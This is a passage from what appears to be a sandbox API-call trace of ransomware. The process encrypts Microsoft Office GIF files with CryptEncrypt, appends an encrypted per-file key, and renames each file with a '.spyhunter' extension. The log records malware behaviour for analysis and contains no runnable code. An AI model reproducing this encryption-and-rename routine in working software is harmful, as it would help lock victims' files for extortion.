lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f87c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f87c*=0x30, lpOverlapped=0x0) returned 1 [0102.456] CloseHandle (hObject=0x170) returned 1 [0102.456] GetProcessHeap () returned 0x2c0000 [0102.456] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0102.456] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21344_.GIF.spyhunter") returned 83 [0102.456] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21344_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21344_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21344_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21344_.gif.spyhunter")) returned 1 [0102.457] GetProcessHeap () returned 0x2c0000 [0102.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0102.457] GetProcessHeap () returned 0x2c0000 [0102.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0102.457] GetProcessHeap () returned 0x2c0000 [0102.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33ac40 | out: hHeap=0x2c0000) returned 1 [0102.457] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8c0 | out: pbBuffer=0x270f8c0) returned 1 [0102.457] GetProcessHeap () returned 0x2c0000 [0102.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0102.457] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8b8*=0x30) returned 1 [0102.457] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21343_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21343_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0102.458] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21343_.GIF") returned 73 [0102.458] StrStrW (lpFirst="BD21343_.GIF", lpSrch=".txt") returned 0x0 [0102.458] GetProcessHeap () returned 0x2c0000 [0102.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0102.458] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f87c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f87c*=0xb6, lpOverlapped=0x0) returned 1 [0102.459] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff4a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.459] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0xb6, lpNumberOfBytesWritten=0x270f87c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f87c*=0xb6, lpOverlapped=0x0) returned 1 [0102.459] GetProcessHeap () returned 0x2c0000 [0102.459] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0102.459] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.460] WriteFile (in: hFile=0x170, lpBuffer=0x270f8bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f87c, lpOverlapped=0x0 | out: lpBuffer=0x270f8bc*, lpNumberOfBytesWritten=0x270f87c*=0x4, lpOverlapped=0x0) returned 1 [0102.460] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f87c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f87c*=0x30, lpOverlapped=0x0) returned 1 [0102.460] CloseHandle (hObject=0x170) returned 1 [0102.460] GetProcessHeap () returned 0x2c0000 [0102.460] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0102.460] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21343_.GIF.spyhunter") returned 83 [0102.460] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21343_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21343_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21343_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21343_.gif.spyhunter")) returned 1 [0102.461] GetProcessHeap () returned 0x2c0000 [0102.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0102.461] GetProcessHeap () returned 0x2c0000 [0102.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0102.461] GetProcessHeap () returned 0x2c0000 [0102.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33ab60 | out: hHeap=0x2c0000) returned 1 [0102.461] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8b8 | out: pbBuffer=0x270f8b8) returned 1 [0102.461] GetProcessHeap () returned 0x2c0000 [0102.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0102.461] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8b0*=0x30) returned 1 [0102.461] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21342_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21342_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0102.462] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21342_.GIF") returned 73 [0102.462] StrStrW (lpFirst="BD21342_.GIF", lpSrch=".txt") returned 0x0 [0102.462] GetProcessHeap () returned 0x2c0000 [0102.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0102.462] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f874, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f874*=0x10a, lpOverlapped=0x0) returned 1 [0102.463] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffef6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.463] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x270f874, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f874*=0x10a, lpOverlapped=0x0) returned 1 [0102.463] GetProcessHeap () returned 0x2c0000 [0102.463] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0102.463] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.463] WriteFile (in: hFile=0x170, lpBuffer=0x270f8b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f874, lpOverlapped=0x0 | out: lpBuffer=0x270f8b4*, lpNumberOfBytesWritten=0x270f874*=0x4, lpOverlapped=0x0) returned 1 [0102.464] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f874, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f874*=0x30, lpOverlapped=0x0) returned 1 [0102.464] CloseHandle (hObject=0x170) returned 1 [0102.464] GetProcessHeap () returned 0x2c0000 [0102.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0102.464] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21342_.GIF.spyhunter") returned 83 [0102.464] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21342_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21342_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21342_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21342_.gif.spyhunter")) returned 1 [0102.467] GetProcessHeap () returned 0x2c0000 [0102.467] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0102.467] GetProcessHeap () returned 0x2c0000 [0102.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0102.468] GetProcessHeap () returned 0x2c0000 [0102.468] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33aa80 | out: hHeap=0x2c0000) returned 1 [0102.468] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8b8 | out: pbBuffer=0x270f8b8) returned 1 [0102.468] GetProcessHeap () returned 0x2c0000 [0102.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0102.468] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8b0*=0x30) returned 1 [0102.468] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21339_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21339_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0102.468] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21339_.GIF") returned 73 [0102.468] StrStrW (lpFirst="BD21339_.GIF", lpSrch=".txt") returned 0x0 [0102.468] GetProcessHeap () returned 0x2c0000 [0102.468] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0102.468] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f874, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f874*=0x6c, lpOverlapped=0x0) returned 1 [0102.469] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffff94, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.469] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x6c, lpNumberOfBytesWritten=0x270f874, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f874*=0x6c, lpOverlapped=0x0) returned 1 [0102.469] GetProcessHeap () returned 0x2c0000 [0102.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0102.470] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.470] WriteFile (in: hFile=0x170, lpBuffer=0x270f8b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f874, lpOverlapped=0x0 | out: lpBuffer=0x270f8b4*, lpNumberOfBytesWritten=0x270f874*=0x4, lpOverlapped=0x0) returned 1 [0102.470] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f874, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f874*=0x30, lpOverlapped=0x0) returned 1 [0102.470] CloseHandle (hObject=0x170) returned 1 [0102.470] GetProcessHeap () returned 0x2c0000 [0102.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0102.470] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21339_.GIF.spyhunter") returned 83 [0102.470] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21339_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21339_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21339_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21339_.gif.spyhunter")) returned 1 [0102.470] GetProcessHeap () returned 0x2c0000 [0102.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0102.471] GetProcessHeap () returned 0x2c0000 [0102.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0102.471] GetProcessHeap () returned 0x2c0000 [0102.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a9a0 | out: hHeap=0x2c0000) returned 1 [0102.471] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8b0 | out: pbBuffer=0x270f8b0) returned 1 [0102.471] GetProcessHeap () returned 0x2c0000 [0102.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0102.471] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8a8*=0x30) returned 1 [0102.471] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21337_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21337_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0102.472] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21337_.GIF") returned 73 [0102.472] StrStrW (lpFirst="BD21337_.GIF", lpSrch=".txt") returned 0x0 [0102.472] GetProcessHeap () returned 0x2c0000 [0102.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0102.472] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f86c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f86c*=0x146, lpOverlapped=0x0) returned 1 [0102.473] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffeba, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.473] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x146, lpNumberOfBytesWritten=0x270f86c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f86c*=0x146, lpOverlapped=0x0) returned 1 [0102.473] GetProcessHeap () returned 0x2c0000 [0102.473] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0102.473] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.473] WriteFile (in: hFile=0x170, lpBuffer=0x270f8ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f86c, lpOverlapped=0x0 | out: lpBuffer=0x270f8ac*, lpNumberOfBytesWritten=0x270f86c*=0x4, lpOverlapped=0x0) returned 1 [0102.473] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f86c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f86c*=0x30, lpOverlapped=0x0) returned 1 [0102.473] CloseHandle (hObject=0x170) returned 1 [0102.473] GetProcessHeap () returned 0x2c0000 [0102.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cc62d0 [0102.473] wnsprintfW (in: pszDest=0x2cc62d0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21337_.GIF.spyhunter") returned 83 [0102.474] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21337_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21337_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21337_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21337_.gif.spyhunter")) returned 1 [0102.474] GetProcessHeap () returned 0x2c0000 [0102.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc62d0 | out: hHeap=0x2c0000) returned 1 [0102.474] GetProcessHeap () returned 0x2c0000 [0102.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0102.474] GetProcessHeap () returned 0x2c0000 [0102.474] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a8c0 | out: hHeap=0x2c0000) returned 1 [0102.474] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8b0 | out: pbBuffer=0x270f8b0) returned 1 [0102.474] GetProcessHeap () returned 0x2c0000 [0102.474] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0102.474] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8a8*=0x30) returned 1 [0102.474] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21335_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21335_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0102.475] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21335_.GIF") returned 73 [0102.475] StrStrW (lpFirst="BD21335_.GIF", lpSrch=".txt") returned 0x0 [0102.475] GetProcessHeap () returned 0x2c0000 [0102.475] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0102.475] ReadFile (in: hFile=0x170, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f86c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x270f86c*=0x3cb, lpOverlapped=0x0) returned 1 [0102.483] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffc35, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.483] WriteFile (in: hFile=0x170, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x3cb, lpNumberOfBytesWritten=0x270f86c, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x270f86c*=0x3cb, lpOverlapped=0x0) returned 1 [0102.484] GetProcessHeap () returned 0x2c0000 [0102.484] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0102.484] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.484] WriteFile (in: hFile=0x170, lpBuffer=0x270f8ac*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f86c, lpOverlapped=0x0 | out: lpBuffer=0x270f8ac*, lpNumberOfBytesWritten=0x270f86c*=0x4, lpOverlapped=0x0) returned 1 [0102.484] WriteFile (in: hFile=0x170, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f86c, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f86c*=0x30, lpOverlapped=0x0) returned 1 [0102.484] CloseHandle (hObject=0x170) returned 1 [0102.494] GetProcessHeap () returned 0x2c0000 [0102.494] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2cb6288 [0102.494] wnsprintfW (in: pszDest=0x2cb6288, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21335_.GIF.spyhunter") returned 83 [0102.494] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21335_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21335_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\BULLETS\\BD21335_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\bullets\\bd21335_.gif.spyhunter")) returned 1 [0102.494] GetProcessHeap () returned 0x2c0000 [0102.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cb6288 | out: hHeap=0x2c0000) returned 1 [0102.494] GetProcessHeap () returned 0x2c0000 [0102.494] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0102.495] GetProcessHeap () returned 0x2c0000 [0102.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x33a7e0 | out: hHeap=0x2c0000) returned 1 [0102.495] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f8a8 | out: pbBuffer=0x270f8a8) returned 1 [0102.495] GetProcessHeap () returned 0x2c0000 [0102.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f188 [0102.495] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f188*, pdwDataLen=0x270f8a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f188*, pdwDataLen=0x270f8a0*=0x30) returned 1 [0102.495] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15155_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15155_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf0 [0102.542] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15155_.GIF") returned 71 [0102.542] StrStrW (lpFirst="BD15155_.GIF", lpSrch=".txt") returned 0x0 [0102.542] GetProcessHeap () returned 0x2c0000 [0102.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0102.542] ReadFile (in: hFile=0xf0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f864, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f864*=0x115, lpOverlapped=0x0) returned 1 [0102.543] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0xfffffeeb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0102.543] WriteFile (in: hFile=0xf0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x115, lpNumberOfBytesWritten=0x270f864, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f864*=0x115, lpOverlapped=0x0) returned 1 [0102.543] GetProcessHeap () returned 0x2c0000 [0102.544] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0102.544] SetFilePointerEx (in: hFile=0xf0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0102.544] WriteFile (in: hFile=0xf0, lpBuffer=0x270f8a4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f864, lpOverlapped=0x0 | out: lpBuffer=0x270f8a4*, lpNumberOfBytesWritten=0x270f864*=0x4, lpOverlapped=0x0) returned 1 [0102.544] WriteFile (in: hFile=0xf0, lpBuffer=0x31f188*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f864, lpOverlapped=0x0 | out: lpBuffer=0x31f188*, lpNumberOfBytesWritten=0x270f864*=0x30, lpOverlapped=0x0) returned 1 [0102.544] CloseHandle (hObject=0xf0) returned 1 [0102.544] GetProcessHeap () returned 0x2c0000 [0102.544] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c7e1b0 [0102.544] wnsprintfW (in: pszDest=0x2c7e1b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15155_.GIF.spyhunter") returned 81 [0102.544] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15155_.GIF" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15155_.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\MEDIA\\OFFICE14\\LINES\\BD15155_.GIF.spyhunter" (normalized: "c:\\program files\\microsoft office\\media\\office14\\lines\\bd15155_.gif.spyhunter")) returned 1 [0102.545] GetProcessHeap () returned 0x2c0000 [0102.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c7e1b0 | out: hHeap=0x2c0000) returned 1 [0102.545] GetProcessHeap () returned 0x2c0000 [0102.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f188 | out: hHeap=0x2c0000) returned 1 [0102.545] GetProcessHeap () returned 0x2c0000 [0102.545] HeapFree (in: 